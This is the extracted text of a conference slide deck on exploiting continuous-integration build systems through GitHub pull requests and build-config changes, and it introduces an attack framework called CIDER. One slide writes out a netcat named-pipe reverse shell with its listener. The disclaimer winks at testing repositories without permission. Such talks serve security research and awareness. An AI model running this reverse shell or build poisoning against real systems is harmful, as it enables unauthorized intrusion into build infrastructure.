Exploiting Continuous Integration (CI) and

Automated Build Systems

And introducing CIDER

Whoami

• SpaceB0x• Sr.SecurityEngineeratLeanKit• Applicationandnetworksecurity(offenseanddefense)• Ilikebreakingintosystems,buildingsystems,andlearning• Securityconsultant

./agenda.sh

• OverviewofContinuousIntegrationconcepts• ConfigurationVulnerabilitiesvs.ApplicationVulnerabilities• Realworldexploit#1• CommonBad-practices• Realworldexploit#2– AttackingtheCIprovider• IntroduceCIDER

ContinuousIntegration

ContinuousIntegration(CI)

• Quickiterativereleaseofcodetoproductionservers• UsuallyManyiterationsperweekorevenperday.• Repositorycentric• InsyncwithAutomatedBuild• Forinfrastructure/servers/subnetsetc.

Microservices

• Breakingdownlargeappintosmalldecoupledcomponents• Thesecomponentsinteractwitheachother• Eliminatessinglepointsoffailure• Autonomousdevelopment

SecurityImplications

• Good- Frequentreleasecyclesarefabulous!• Good- Fastercodedeployments=quickremediation• Good- Decoupledsystemsreducedsinglepointsoffailure• Good- Compromiseofoneservicedoesn’t(always)meanfullpwnage

SecurityImplications

• Good- Frequentreleasecyclesarefabulous!• Good- Fastercodedeployments=quickremediation• Good- Decoupledsystemsreducedsinglepointsoffailure• Good- Compromiseofoneservicedoesn’t(always)meanfullpwnage

• Bad- Fastreleasesometimesmeanshastyoversights• Bad– AutomatedDeploymentsystemsarechecked lessthanthecodethattheydeploy

Tools

BuildSystems

• Takecodeandbuildconditionally• Typicallyinaquasicontainerizedtypeofenvironment• Bothlocalandcloudbasedarepopular

• Vendor:ØTravis-CIØCircle-CIØDroneØTeamCityØBuildKite

DeploymentSystems

• Deploythecodeafterbuild• Headingmoreandmoretowardcontainerdriven

• VendorsØJenkinsØOctopusDeployØKubernetesØRancherØMesosphere

ChainsofDeployment

ChainsofDeployment

Chainsofdeployment

ChecksintheSDLC

• Buildtestbeforemerges• Web-hookstriggerspecificactionsbasedonconditions• Servicesconfiguredwithoutregardtooneanother

ConfigurationProblems

GitHub– Hugeattacksurface

• Pullrequestsandcommitstriggerbuilds• Buildconfigurationsnormallyinrootofrepo• Thusbuildconfig changecanbepartofPRorcommit• Gaincontrolofmultiplesystemsthroughpullrequests

VulnerabilitiesareinMisconfiguration

• Creativeconfigurationexploitation• Vuln stackingatit’sfinest• Eachindividualservicemaybefunctioningexactlyasintended• Interactionbetweenservicesiswheremanyvulnerabilitieslie

ExternalRepos

• Mostvolatileattacksurface• Publicrepositorieswhichmaptointernalbuildservices

RealWorldHax #1

mknod /tmp/backpipe p

mknod /tmp/backpipe p/bin/sh 0</tmp/backpipe|nc x.x.x.x 4444 1>/tmp/backpipe

mknod /tmp/backpipe p/bin/sh 0</tmp/backpipe|nc x.x.x.x 4444 1>/tmp/backpipe

nc –l 4444

root

Bad-PracticesWorst-Practices

EnvironmentVars

• Beingusedtostorecredentials• Storingmetadataforotherserviceswithinmicro-serviceinfrastructure

Runeverythingasroot

• Justacontainer,rightguyz?• Younowhaveinternalnetworkaccess• Fullcontroltobuildaugmenttheimage

CIProviderInfoleak

• ProblemswiththeCIProvidersthemselves• LeakSSHkeys,etc.whichcancompromiseothercustomersonhost• CIprovidershaveatleastsomepermissionstoGitHubrepos• CloudbasedCIprovidershaveahostingenvironment• Speakingofwhich…

RealWorldHax #2

IntroducingCIDER

WhatisCIDER?

•ContinuousIntegrationandDeploymentExploiteR

WhatisCIDER?

•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains

WhatisCIDER?

•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains• MainlyleveragesGitHubasattacksurfacetogettobuildservices

WhatisCIDER?

•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains• MainlyleveragesGitHubasattacksurfacetogettobuildservices• Takesthemessoutforking,PR-ing,callbacking

WhatisCIDER?

•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains• MainlyleveragesGitHubasattacksurfacetogettobuildservices• Takesthemessoutforking,PR-ing,callbacking• Itwillpoisonahandfulofbuildservicesand”exploits”foreachone

WhyCIDER?

• Fun• Makeattackingeasy• Awareness• RottenApple by@claudijd• Facilitatefurtherresearch

CIDERoverview

CIDER– ‘help’

CIDER– ‘addtarget’&‘listtargets’

CIDER– ‘load’and‘info’

CIDERfeatures

• Node.JS• Buildmodularly• Canhandlebulklistsoftargetrepos• CleanupforGitHubrepocraziness• Ngrok – becauseportforwardingandpublicIPssuck

Ngrok

Disclaimer

• ItisagainsttheGitHubuseragreementtotestagainstarepository,evenifyouhavepermissionfromtheowneroftherepo

• Youmustbetheownertotestarepo• Whentestingaskthemtomakeyouanowner

WINKWINK

DEMO

Limitations

• BuildQueues• GitHubNoise• Timeouts• RepoAPIrequestthrottling

Justthebeginning…

• MoreCI-Frameworks• Starttacklingdeploymentservices• Startexploringotherentrypoints

• Othercoderepositories• ChatOps (Slack)

Thanks

• LeanKitOperationsTeam• EvanSnapp• @claudijd

Fin

CIDERonGithub: https://github.com/spaceB0x/cider

Twitter:@spaceB0xxwww.untamedtheory.com